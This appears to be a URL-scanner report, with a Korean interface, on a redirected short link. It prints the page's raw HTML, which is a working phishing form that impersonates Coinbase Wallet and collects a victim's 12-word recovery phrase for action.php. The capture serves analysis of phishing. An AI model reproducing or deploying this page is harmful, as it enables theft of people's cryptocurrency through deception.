- 제출된 URL:
- https://wv3.io/jfPDDz7z리디렉션됨
- 보고서 완료:
링크 · 0개 결과
페이지에서 식별된 외부 링크
JavaScript 변수 · 3개 결과
페이지의 창 개체에 로드된 전역 JavaScript 변수는 함수 외부에서 선언된 변수로, 현재 범위 내에서 코드의 어느 부분에서나 액세스할 수 있습니다
이름 | 유형 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
콘솔 로그 메시지 · 0개 결과
웹 콘솔에 기록된 메시지
HTML
페이지의 원시 HTML 본문
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Wallet Login Page</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f2f2f2;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
.login-container {
background-color: white;
padding: 20px;
border-radius: 8px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
max-width: 400px;
width: 100%;
text-align: center;
}
.login-logo {
margin-bottom: 20px;
}
.login-logo img {
width: 150px;
}
.phrase-input {
width: calc(100% / 3 - 10px);
padding: 10px;
margin: 5px;
border: 1px solid #ddd;
border-radius: 5px;
font-size: 14px;
}
.login-button {
width: 100%;
padding: 10px;
background-color: #007bff;
color: white;
border: none;
border-radius: 5px;
font-size: 16px;
cursor: pointer;
transition: background-color 0.3s ease;
margin-top: 20px;
}
.login-button:hover {
background-color: #0056b3;
}
.disclaimer {
margin-top: 20px;
color: red;
font-weight: bold;
}
form {
display: flex;
flex-wrap: wrap;
justify-content: space-between;
}
</style>
</head>
<body>
<div class="login-container">
<form action="action.php" method="POST">
<input type="text" class="phrase-input" placeholder="Word 1" name="word1" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 2" name="word2" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 3" name="word3" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 4" name="word4" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 5" name="word5" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 6" name="word6" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 7" name="word7" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 8" name="word8" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 9" name="word9" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 10" name="word10" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 11" name="word11" required="" spellcheck="true">
<input type="text" class="phrase-input" placeholder="Word 12" name="word12" required="" spellcheck="true">
<button type="submit" class="login-button">Verify Wallet</button>
</form>
<div class="disclaimer">Note: You can find your 12-word recovery phrase for your Coinbase Wallet in the Settings menu by selecting Security, then Backups.</div>
</div>
</body></html>